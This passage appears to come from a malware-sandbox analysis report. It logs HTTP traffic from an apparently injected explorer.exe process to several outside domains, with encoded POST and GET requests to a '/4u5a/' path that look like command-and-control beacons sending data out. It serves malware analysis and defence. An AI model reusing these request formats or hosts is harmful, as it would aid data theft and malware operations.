57 7a 79 4b 49 52 5f 4b 54 6d 62 28 5f 66 41 79 37 32 45 7a 51 4a 43 75 44 7e 32 28 53 49 75 65 47 30 52 43 55 4c 56 41 33 65 59 7e 46 4d 6d 77 51 59 71 72 56 45 61 44 52 71 61 53 6a 77 57 44 57 28 72 76 69 67 31 4e 77 73 77 7a 65 34 34 73 50 7e 46 4e 34 4e 50 48 46 66 55 30 55 33 54 62 2d 4c 42 6a 37 78 4d 34 76 34 66 75 2d 62 36 50 63 41 7a 6b 59 34 64 50 67 48 56 52 30 72 39 68 75 71 6d 33 55 4e 66 30 69 78 4d 41 58 4a 75 7a 6c 70 45 54 51 52 6d 32 78 63 54 6a 74 36 72 4a 37 77 5a 35 46 45 4d 4c 75 51 4e 47 65 56 51 63 56 6e 68 69 4a 5a 4c 55 6d 37 45 65 72 4f 4a 6e 4c 54 35 66 4e 39 64 38 31 42 6d 4c 5f 61 47 71 53 56 38 74 42 41 5a 54 70 30 4e 33 6a 61 57 62 56 59 69 59 34 7e 57 6e 4a 28 34 48 52 6c 4a 32 51 71 59 59 75 51 5f 55 54 66 31 38 66 37 42 66 79 4a 77 67 35 51 70 72 43 36 45 43 54 4c 65 57 64 35 37 55 49 43 52 47 5f 32 5f 6b 2d 6a 42 74 43 78 59 28 4f 4c 67 41 78 42 67 6f 52 45 61 48 36 6e 47 4a 6e 39 37 63 6f 49 4a 6d 64 6f 6a 28 58 49 7a 6a 74 66 55 38 6a 5a 5a 6d 37 4c 59 66 72 31 52 44 62 70 6c 58 77 61 74 73 66 6b 52 32 62 57 42 71 46 43 72 52 75 4d 4b 30 74 4c 47 72 62 56 6e 36 35 64 39 72 42 62 7a 65 53 46 73 7e 67 33 6c 65 77 38 75 4d 4d 4a 75 49 38 30 36 67 44 5a 55 51 6c 7a 77 69 79 68 56 79 39 52 4d 4e 44 76 6d 6d 64 30 69 78 55 47 58 46 4f 47 41 28 78 4f 42 4c 50 66 75 7e 64 35 30 63 57 77 4a 63 4e 33 58 4e 53 44 46 4a 31 78 4d 74 61 39 57 57 76 48 63 41 6a 7a 55 46 4a 32 71 61 32 4e 51 76 4f 42 48 78 79 61 76 69 78 70 36 37 74 30 72 79 7a 38 78 6d 44 4d 70 45 36 28 68 6a 79 52 5f 4e 4c 54 51 42 58 62 7a 4a 31 71 5a 64 48 64 45 4f 50 4e 64 70 76 52 39 65 53 4d 69 37 51 39 7a 63 78 58 5a 69 79 48 6b 50 4c 6a 59 49 4a 47 55 45 32 63 35 74 53 65 61 79 4e 67 54 4e 32 64 34 4c 78 6f 42 54 52 33 69 43 46 48 51 33 65 39 6e 44 43 4f 43 73 31 39 31 55 4a 77 56 73 6b 32 77 34 61 44 70 56 74 70 74 67 43 33 4d 75 73 7e 51 53 45 76 58 6a 68 7e 63 46 42 46 69 6c 2d 35 31 42 30
                                        Data Ascii: l0GX=OMUyI4HK512-h3Qz3d8RVc(xeZHQrIKj5ri10zkUjnK_vPBwXyAN11LZifCOebvQ(Fr-y9aBxp7U3bf3usjdYFDFLSTlbQVOdmGeSEUaKLpJ(ROGWQaLae5dJrKYsAgHVC7bKaqD3C59(ZQhJz0lBrh8bldPBCF7yGBFYeK-ir8KlZNr~cbDhxaTz_OINyn7ToWM~sQ3oPoLapOA3A60nOgjFMWirRLh50ixrKjAdQrv6QS7j3QrS_~Zs086rE4RtwVLzHmMTK~DbXb_NQGmib7JFNIUSG69tHJuMdc_c-0aUnkLXFTH1ZHaInBPc7eoUNy-oO4aj8SeG_fjepzqireFoDSQZ1tveCWqWm2OiZQKx_81gHQrSzC_cjcLdjFib5AtUI~g4SRHQZzQuRYAb9P5yfTMaK8aKsridxMh0wHaviZEZhB0x5A2OpFf3lUTpaq1VN6B8R4ocDX1~tohzhNVFcai4nGxy2Ebje8I~7Hb1zeyaoMkCwZBie0LAiVc0tFvBS1GygU-FBdF3eLOM-(D4xOqpKZ_9-BgsGywd3Wp~SR56kznVRNwoDmUrnPCHB1B~enK2UDDlq2qb2BmJQzXgn5-R-HUVPWkbDZqIan3hSWUNbPUR9mGWAbk7HUXKF~6KA4_A4ZpVBIG9Tf0u1ZK4iI6ODIY9sHzqj~xjR6DMyPiTZM99_cocceFtnTX21G5u_~3o0qrjWzyKIR_KTmb(_fAy72EzQJCuD~2(SIueG0RCULVA3eY~FMmwQYqrVEaDRqaSjwWDW(rvig1Nwswze44sP~FN4NPHFfU0U3Tb-LBj7xM4v4fu-b6PcAzkY4dPgHVR0r9huqm3UNf0ixMAXJuzlpETQRm2xcTjt6rJ7wZ5FEMLuQNGeVQcVnhiJZLUm7EerOJnLT5fN9d81BmL_aGqSV8tBAZTp0N3jaWbVYiY4~WnJ(4HRlJ2QqYYuQ_UTf18f7BfyJwg5QprC6ECTLeWd57UICRG_2_k-jBtCxY(OLgAxBgoREaH6nGJn97coIJmdoj(XIzjtfU8jZZm7LYfr1RDbplXwatsfkR2bWBqFCrRuMK0tLGrbVn65d9rBbzeSFs~g3lew8uMMJuI806gDZUQlzwiyhVy9RMNDvmmd0ixUGXFOGA(xOBLPfu~d50cWwJcN3XNSDFJ1xMta9WWvHcAjzUFJ2qa2NQvOBHxyavixp67t0ryz8xmDMpE6(hjyR_NLTQBXbzJ1qZdHdEOPNdpvR9eSMi7Q9zcxXZiyHkPLjYIJGUE2c5tSeayNgTN2d4LxoBTR3iCFHQ3e9nDCOCs191UJwVsk2w4aDpVtptgC3Mus~QSEvXjh~cFBFil-51B0Ov9vtnzXqJn-faraplYwcqz1PzCu6_cezY3jGHe16-88xWng9qD1gh~ZlTpYz5hmLigbFFJCz9ifXOmR~tURoJ1Gk.
                                        Nov 29, 2022 18:25:14.623873949 CET123INHTTP/1.1 405 Not Allowed
                                        Date: Tue, 29 Nov 2022 17:25:14 GMT
                                        Content-Type: text/html
                                        Content-Length: 150
                                        Connection: close
                                        Server: UD Forwarding 3.1
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        3192.168.2.64971789.31.143.180C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:25:16.654036999 CET124OUTGET /4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s HTTP/1.1
                                        Host: www.dersameh.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 29, 2022 18:25:16.677865982 CET124INHTTP/1.1 200 OK
                                        Date: Tue, 29 Nov 2022 17:25:16 GMT
                                        Content-Type: text/html
                                        Content-Length: 6637
                                        Last-Modified: Thu, 21 Jan 2021 10:26:31 GMT
                                        Connection: close
                                        ETag: "600956d7-19ed"
                                        Server: UD Forwarding 3.1
                                        Accept-Ranges: bytes
                                        Nov 29, 2022 18:25:16.677930117 CET125INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 72 65 67 69
                                        Data Ascii: <!DOCTYPE html><html lang="de"><head><meta name="description" content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,h
                                        Nov 29, 2022 18:25:16.677973986 CET127INData Raw: 70 45 41 50 59 61 64 38 47 41 36 41 41 41 41 41 58 52 53 54 6c 4d 41 51 4f 62 59 5a 67 41 41 42 38 70 4a 52 45 46 55 65 4e 72 74 6d 6f 75 53 6f 79 6f 51 51 42 73 78 43 42 68 41 35 50 48 2f 6e 33 70 74 6e 6f 62 64 5a 4a 78 39 31 63 79 74 6e 4b 70
                                        Data Ascii: pEAPYad8GA6AAAAAXRSTlMAQObYZgAAB8pJREFUeNrtmouSoyoQQBsxCBhA5PH/n3ptnobdZJx91cytnKpJCELTHkHJbuDN94WwVSFihjefhggXYwwhRHyzHN58BqJCDEbNal1nE5Eg4M1lePB2JcSGeMK/V/JVjCU438SqQjzznoSXIH6FyqScESIWgoE3F/wJqMxhSm/MWhRo4tvgx1gBHUZayfuofFzh/wpTDP4Eyjzb1oCP
                                        Nov 29, 2022 18:25:16.678021908 CET128INData Raw: 37 63 35 2b 38 34 7a 32 77 33 36 44 37 57 50 79 31 51 48 2b 36 4b 4f 79 53 51 47 51 32 46 7a 65 43 4e 61 50 36 2b 48 54 58 42 4d 62 7a 58 64 78 41 51 51 43 38 66 67 72 50 5a 6c 78 51 33 73 61 52 41 4d 2b 66 77 75 64 72 56 73 71 52 76 42 5a 34 7a
                                        Data Ascii: 7c5+84z2w36D7WPy1QH+6KOySQGQ2FzeCNaP6+HTXBMbzXdxAQQC8fgrPZlxQ3saRAM+fwudrVsqRvBZ4ztdeEDhNkDAXBfL4gPlQYKjGmaqdg+GMKRMiPOwDWd8HVjwhLr6kXw9VPjIgvO4Dq0lft57Y/KXAni9wFy8IVNGblbE1XBM47venDwXa2IBxPo1X5AeBqxie3aE8RYYV/PybyByG+Uo+EKji5x4idvTxmiEjAR8KZA
                                        Nov 29, 2022 18:25:16.678066969 CET129INData Raw: 64 30 6e 6b 47 32 58 4f 48 4d 42 77 36 55 5a 69 45 47 77 30 35 65 47 33 72 56 47 61 33 51 42 57 48 42 50 6e 61 78 69 49 52 32 37 4c 2f 68 42 45 69 42 33 66 59 50 6c 71 4c 67 42 4e 6c 39 79 4f 33 77 6c 6b 70 44 55 68 6b 70 63 31 61 6c 4a 2f 6f 7a
                                        Data Ascii: d0nkG2XOHMBw6UZiEGw05eG3rVGa3QBWHBPnaxiIR27L/hBEiB3fYPlqLgBNl9yO3wlkpDUhkpc1alJ/ozFWrPUTtj+qDwiSxw0HaaQR6VA7hKghMPMSqf/AOVXTmgqvu9mAAAAAElFTkSuQmCC);overflow:hidden;text-indent:-9999px;font-size:0;color:rgba(255,255,255,0);text-align:left}#log
                                        Nov 29, 2022 18:25:16.678113937 CET131INData Raw: 6c 6c 74 2e 20 53 69 65 20 77 69 72 64 20 62 65 69 20 6a 65 64 65 72 20 6e 65 75 65 6e 20 44 6f 6d 61 69 6e 20 68 69 6e 74 65 72 6c 65 67 74 20 75 6e 64 20 7a 65 69 67 74 2c 20 64 61 73 73 20 64 69 65 20 6e 65 75 65 20 44 6f 6d 61 69 6e 20 65 72
                                        Data Ascii: llt. Sie wird bei jeder neuen Domain hinterlegt und zeigt, dass die neue Domain erreichbar ist.<br>Ohne diese Platzhalter-Seite w&uuml;rden Besucher eine Fehlermeldung erhalten. Als Kunde von united-domains k&ouml;nnen Sie diese Domain in Ihre
                                        Nov 29, 2022 18:25:16.678148985 CET131INData Raw: 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 20 6e 6f 6f 70 65 6e 65 72 22 3e 44 61 74 65 6e 73 63 68 75 74 7a 68 69 6e 77 65 69 73 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72
                                        Data Ascii: rel="nofollow noopener">Datenschutzhinweise</a></p></div></div><div class="footer-wrapper"><div class="footer">&copy; united-domains AG. <span>&nbsp;Alle Rechte vorbehalten.</span></div></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        4192.168.2.64971854.38.220.8580C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:25:21.776768923 CET132OUTPOST /4u5a/ HTTP/1.1
                                        Host: www.darkchocolatebliss.com
                                        Connection: close
                                        Content-Length: 190
                                        Cache-Control: no-cache
                                        Origin: http://www.darkchocolatebliss.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.darkchocolatebliss.com/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 6c 30 47 58 3d 6b 78 6b 2d 48 45 6d 75 43 65 6c 57 71 4e 67 47 36 79 57 44 69 72 48 68 79 33 54 50 70 4d 63 69 4e 37 30 42 7e 43 65 42 52 4b 77 31 74 30 41 47 57 35 77 36 33 42 7a 51 7e 68 75 4b 4d 2d 36 30 32 65 70 42 77 49 69 43 6b 59 30 75 6a 58 61 44 67 55 67 47 47 78 4a 44 4b 75 35 38 78 4d 37 7a 54 34 4b 56 77 5f 4a 54 7e 65 61 5f 6c 47 67 50 36 69 62 4b 6f 64 64 31 76 4e 33 69 49 64 5a 35 69 52 4e 56 6a 6c 44 76 44 59 50 6c 54 6e 72 6b 4a 64 6e 5a 38 46 6a 78 68 7a 74 6e 71 5a 47 44 30 4e 61 36 58 50 6b 69 36 31 46 53 36 30 77 69 56 41 28 74 69 70 30 2e 00 00 00 00 00 00 00 00
                                        Data Ascii: l0GX=kxk-HEmuCelWqNgG6yWDirHhy3TPpMciN70B~CeBRKw1t0AGW5w63BzQ~huKM-602epBwIiCkY0ujXaDgUgGGxJDKu58xM7zT4KVw_JT~ea_lGgP6ibKodd1vN3iIdZ5iRNVjlDvDYPlTnrkJdnZ8FjxhztnqZGD0Na6XPki61FS60wiVA(tip0.


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        5192.168.2.64971954.38.220.8580C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:25:23.822163105 CET134OUTPOST /4u5a/ HTTP/1.1
                                        Host: www.darkchocolatebliss.com
                                        Connection: close
                                        Content-Length: 1454
                                        Cache-Control: no-cache
                                        Origin: http://www.darkchocolatebliss.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.darkchocolatebliss.com/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 6c 30 47 58 3d 6b 78 6b 2d 48 45 6d 75 43 65 6c 57 6f 75 6f 47 34 54 57 44 7a 62 48 2d 73 48 54 50 77 63 63 6d 4e 37 34 42 7e 47 47 52 52 38 51 31 73 6d 34 47 58 61 49 36 36 68 7a 51 70 78 75 4f 50 4f 37 32 32 65 39 4e 77 4a 54 67 6b 61 59 75 69 30 69 44 6d 57 49 48 66 52 4a 64 64 4f 35 7a 78 4d 37 63 54 34 61 52 77 5f 4d 49 7e 61 32 5f 6c 56 59 50 72 79 62 4c 6e 39 64 31 76 4e 33 75 49 64 59 6f 69 58 6c 33 6a 6b 4c 46 43 71 48 6c 54 43 6e 6b 61 71 62 59 30 6c 69 34 28 44 73 72 73 4c 66 75 73 37 62 4f 66 2d 41 61 73 33 46 4f 36 57 46 52 51 79 37 47 33 4a 63 38 35 6a 52 69 32 67 73 52 4a 4e 6f 33 6e 61 41 5a 4f 74 6c 2d 54 42 74 44 7a 4a 66 65 42 31 34 61 44 4d 6b 37 74 79 6a 56 62 49 36 77 57 59 39 30 73 36 28 30 44 57 50 35 4a 61 6f 79 78 72 4a 76 64 65 49 30 28 4f 54 4c 46 48 34 70 44 7a 6e 34 28 32 6f 78 7a 4f 62 71 73 6b 33 49 59 36 63 45 30 76 47 78 71 39 35 33 65 4b 6f 43 41 33 4d 41 6e 75 44 36 4a 49 4a 67 6a 66 65 5f 42 4d 47 77 4b 54 72 4a 6e 38 6c 5f 36 63 49 41 6b 50 4d 70 77 43 6d 32 6e 53 75 57 7a 7a 50 30 73 47 61 77 54 4f 52 63 31 53 38 69 76 33 75 30 51 70 62 37 34 6b 6b 6a 32 67 38 39 72 58 68 32 55 75 39 48 51 49 58 6b 43 35 75 44 73 6f 7e 78 6d 59 51 54 46 4e 70 55 41 35 68 54 59 5a 63 57 79 58 41 70 4e 6e 72 5f 72 6b 38 58 63 50 66 51 70 34 34 37 6b 6e 28 71 50 32 6b 57 52 36 37 69 53 6f 76 67 77 44 6f 53 4f 35 54 34 56 54 73 4e 68 76 46 4b 6a 38 4e 34 63 71 4e 53 59 33 33 57 4a 32 4a 73 64 67 70 47 41 78 39 6a 34 38 77 37 67 51 7a 32 46 49 44 72 34 71 63 59 44 45 72 71 75 31 38 30 39 33 57 36 5a 72 6f 47 76 50 79 69 70 6b 45 42 57 68 35 32 51 78 4c 31 37 5a 64 65 4c 46 73 76 52 69 61 42 62 75 59 4a 55 5a 6e 52 56 4b 4e 5a 34 42 7e 35 51 67 58 79 57 6e 4c 79 62 2d 72 31 77 74 47 36 5a 74 70 53 4e 78 59 49 65 6d 41 42 56 7a 75 2d 66 65 4c 41 77 43 71 53 53 4b 71 52 49 37 46 67 7e 6c 50 53 59 55 4b 69 47 44 38 73 43 75 38 33 4b 30 4d 66 38 66 4f 37 38 6f 46 50 42 69 37 58 46 72 59 75 5a 4e 53 45 4b 38 7a 71 38 5f 56 50 79 78 34 47 67 67 75 52 54 43 61 77 33 4b 6f 5f 54 46 48 49 5a 59 58 58 5a 43 32 67 38 34 71 74 73 42 66 75 72 41 45 34 6e 43 38 75 48 71 62 42 36 34 78 42 38 45 30 38 77 46 6b 35 67 42 33 66 30 4a 58 71 54 38 49 71 75 51 41 78 6b 6a 6c 67 54 33 4d 6b 49 69 66 56 28 39 43 39 50 7a 44 35 32 30 7a 69 64 61 67 47 4c 4f 4d 43 61 68 56 68 64 54 47 5a 47 43 6b 35 55 76 65 76 28 57 30 76 65 59 5a 74 7e 37 74 37 61 53 57 68 30 65 51 6c 33 6e 7e 57 65 45 50 79 74 31 79 6b 32 69 74 74 5a 73 4c 61 61 77 62 4a 61 4e 30 43 4a 54 6c 46 78 44 73 53 47 50 78 6d 78 7a 47 62 6f 65 46 41 63 6b 64 6c 53 62 30 33 28 48 4d 42 55 6e 62 46 7e 41 65 77 61 46 46 6f 42 4c 69 54 65 32 74 50 64 58 33 61 46 65 44 4d 39 45 6d 49 68 44 38 42 78 42 6c 4a 4c 55 43 73 58 50 6e 6c 38 72 62 6f 65 64 4d 59 4e 54 4e 4b 6b 34 6f 56 62 78 4b 57 7e 5f 7e 53 28 36 58 45 48 4e 36 62 32 52 57 6d 65 70 43 36 6c 5a 4e 30 51 6f 37 47 54 65 39 39 48 74 57 52 35 4e 73 55 36 46 73 71 42 2d 75 63 48 75 39 36 47 6b 56 77 6b 42 42 4a 6c 75 58 63 6f 63 76 33 37 62 61 58 68 64 53 74 78 32 69 57 43 34 6f 6e 53 38 51 6c 46 37 4f 54 66 53 43 46 61 38 77 6e 47 55 4a 64 38 43 52 63 34 53 42 74 36 43 65 41 4f 6d 37 41 45 36 6f 35 75 6c 34 73 42 4d 47 54 72 62 53 6d 41 65 53 53 42 70 75 71 35 39 49 5f 61 6a 56 6b 7e 72 4f 73 5a 44 78 31 63 49 56 41 34 4c 78 68 62 6e 64 68 53 6e 61 62 34 79 68 71 63 64 4b 75 32 4e 4e 44 49 48 79 44 47 41 55 36 68 66 59 41 56 70 54 34 33 47 56 6b 4a 39 49 70 79 4b 63 4c 58 38 6a 64 72 32 35 6e 46 64 49 43 73 36 59 4b 47 79 7e 79 4c 72 32 62 4f 6c 70 67 4e 72 51 53 69 45 6f 6a 48 64 34 74 55 64 4c 76 71 34 68 50 6c 5a 78 45 33 61 69 54 6a 64 67 5a 52 46 65 49 34 4c 74 30 62 73 28 74 54 42 68 6a 46 32 41 45 69 4f 38 72 43 47 47 4f 7e 33 54 51 30 79 75 7a 65 63 55 74 4f 78 49 59 74 2d 4f 33 6d 35 55 73 55 79 7a 6d 57 48 32 59 54 6d 28 66 33 70 4c 4f 32 30 75 33 64 48 48 49 59 69 63 4d 72 66 7a 62 28 75 62 73 4f 45 65 4a 63 48 45 54 68 41 57 33 41 56 50 71 6c 39 4d 2d 4e 4e 68 39 66 68 6d 61 38 4a 46 43 61 7a 6d 4b 35 6c 4d 45 47 71 6c 38 36 71 6e 6e 6c 78 7a 4b 7a 6b 45 6f 7a 65 4e 78 66 6d 58 6f 68 6e 4a 6f 4a 48
                                        Data Ascii: l0GX=kxk-HEmuCelWouoG4TWDzbH-sHTPwccmN74B~GGRR8Q1sm4GXaI66hzQpxuOPO722e9NwJTgkaYui0iDmWIHfRJddO5zxM7cT4aRw_MI~a2_lVYPrybLn9d1vN3uIdYoiXl3jkLFCqHlTCnkaqbY0li4(DsrsLfus7bOf-Aas3FO6WFRQy7G3Jc85jRi2gsRJNo3naAZOtl-TBtDzJfeB14aDMk7tyjVbI6wWY90s6(0DWP5JaoyxrJvdeI0(OTLFH4pDzn4(2oxzObqsk3IY6cE0vGxq953eKoCA3MAnuD6JIJgjfe_BMGwKTrJn8l_6cIAkPMpwCm2nSuWzzP0sGawTORc1S8iv3u0Qpb74kkj2g89rXh2Uu9HQIXkC5uDso~xmYQTFNpUA5hTYZcWyXApNnr_rk8XcPfQp447kn(qP2kWR67iSovgwDoSO5T4VTsNhvFKj8N4cqNSY33WJ2JsdgpGAx9j48w7gQz2FIDr4qcYDErqu18093W6ZroGvPyipkEBWh52QxL17ZdeLFsvRiaBbuYJUZnRVKNZ4B~5QgXyWnLyb-r1wtG6ZtpSNxYIemABVzu-feLAwCqSSKqRI7Fg~lPSYUKiGD8sCu83K0Mf8fO78oFPBi7XFrYuZNSEK8zq8_VPyx4GgguRTCaw3Ko_TFHIZYXXZC2g84qtsBfurAE4nC8uHqbB64xB8E08wFk5gB3f0JXqT8IquQAxkjlgT3MkIifV(9C9PzD520zidagGLOMCahVhdTGZGCk5Uvev(W0veYZt~7t7aSWh0eQl3n~WeEPyt1yk2ittZsLaawbJaN0CJTlFxDsSGPxmxzGboeFAckdlSb03(HMBUnbF~AewaFFoBLiTe2tPdX3aFeDM9EmIhD8BxBlJLUCsXPnl8rboedMYNTNKk4oVbxKW~_~S(6XEHN6b2RWmepC6lZN0Qo7GTe99HtWR5NsU6FsqB-ucHu96GkVwkBBJluXcocv37baXhdStx2iWC4onS8QlF7OTfSCFa8wnGUJd8CRc4SBt6CeAOm7AE6o5ul4sBMGTrbSmAeSSBpuq59I_ajVk~rOsZDx1cIVA4LxhbndhSnab4yhqcdKu2NNDIHyDGAU6hfYAVpT43GVkJ9IpyKcLX8jdr25nFdICs6YKGy~yLr2bOlpgNrQSiEojHd4tUdLvq4hPlZxE3aiTjdgZRFeI4Lt0bs(tTBhjF2AEiO8rCGGO~3TQ0yuzecUtOxIYt-O3m5UsUyzmWH2YTm(f3pLO20u3dHHIYicMrfzb(ubsOEeJcHEThAW3AVPql9M-NNh9fhma8JFCazmK5lMEGql86qnnlxzKzkEozeNxfmXohnJoJHyEdtEnUwzvs6~zeo6pC4fFnZgAxeAjAAWp(kBPPieoVfrkJSnOaNBFET3vNEwPBsvmXcfWPklG1luHqinzYJUBlIY.


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        6192.168.2.64972054.38.220.8580C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:25:25.865695000 CET135OUTGET /4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 HTTP/1.1
                                        Host: www.darkchocolatebliss.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 29, 2022 18:25:25.884027958 CET135INHTTP/1.1 404 Not Found
                                        Server: nginx/1.14.0 (Ubuntu)
                                        Date: Tue, 29 Nov 2022 17:25:25 GMT
                                        Content-Type: text/html
                                        Content-Length: 178
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        7192.168.2.649721154.209.6.24180C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:25:31.457118988 CET137OUTPOST /4u5a/ HTTP/1.1
                                        Host: www.y31jaihdb6zm87.buzz
                                        Connection: close
                                        Content-Length: 190
                                        Cache-Control: no-cache
                                        Origin: http://www.y31jaihdb6zm87.buzz
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.y31jaihdb6zm87.buzz/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 6c 30 47 58 3d 6c 66 6a 65 6d 53 6c 4c 42 38 6e 67 6c 33 72 48 49 65 79 58 61 59 34 6d 63 63 4e 51 65 44 58 74 30 4c 59 77 79 6f 55 64 32 5f 74 54 54 6d 57 31 44 76 53 65 74 37 57 6b 55 5f 70 6a 35 72 5a 37 6e 58 7a 41 57 39 57 70 73 78 66 51 6e 4d 76 79 4a 35 51 56 4c 68 67 57 55 6b 4a 6a 37 55 64 56 6a 5f 76 33 35 4a 44 64 42 63 69 75 53 44 32 44 70 6e 66 70 31 49 70 6d 62 75 74 64 56 48 75 77 6f 5f 43 79 54 6a 78 38 39 49 4a 79 6d 62 75 39 56 57 56 31 52 61 4e 34 64 62 59 70 33 58 39 77 61 38 4f 46 42 6d 53 30 50 63 65 57 61 43 7e 51 70 33 65 50 4a 30 73 2e 00 00 00 00 00 00 00 00
                                        Data Ascii: l0GX=lfjemSlLB8ngl3rHIeyXaY4mccNQeDXt0LYwyoUd2_tTTmW1DvSet7WkU_pj5rZ7nXzAW9WpsxfQnMvyJ5QVLhgWUkJj7UdVj_v35JDdBciuSD2Dpnfp1IpmbutdVHuwo_CyTjx89IJymbu9VWV1RaN4dbYp3X9wa8OFBmS0PceWaC~Qp3ePJ0s.
                                        Nov 29, 2022 18:25:32.221436024 CET138OUTPOST /4u5a/ HTTP/1.1
                                        Host: www.y31jaihdb6zm87.buzz
                                        Connection: close
                                        Content-Length: 190
                                        Cache-Control: no-cache
                                        Origin: http://www.y31jaihdb6zm87.buzz
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.y31jaihdb6zm87.buzz/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 6c 30 47 58 3d 6c 66 6a 65 6d 53 6c 4c 42 38 6e 67 6c 33 72 48 49 65 79 58 61 59 34 6d 63 63 4e 51 65 44 58 74 30 4c 59 77 79 6f 55 64 32 5f 74 54 54 6d 57 31 44 76 53 65 74 37 57 6b 55 5f 70 6a 35 72 5a 37 6e 58 7a 41 57 39 57 70 73 78 66 51 6e 4d 76 79 4a 35 51 56 4c 68 67 57 55 6b 4a 6a 37 55 64 56 6a 5f 76 33 35 4a 44 64 42 63 69 75 53 44 32 44 70 6e 66 70 31 49 70 6d 62 75 74 64 56 48 75 77 6f 5f 43 79 54 6a 78 38 39 49 4a 79 6d 62 75 39 56 57 56 31 52 61 4e 34 64 62 59 70 33 58 39 77 61 38 4f 46 42 6d 53 30 50 63 65 57 61 43 7e 51 70 33 65 50 4a 30 73 2e 00 00 00 00 00 00 00 00
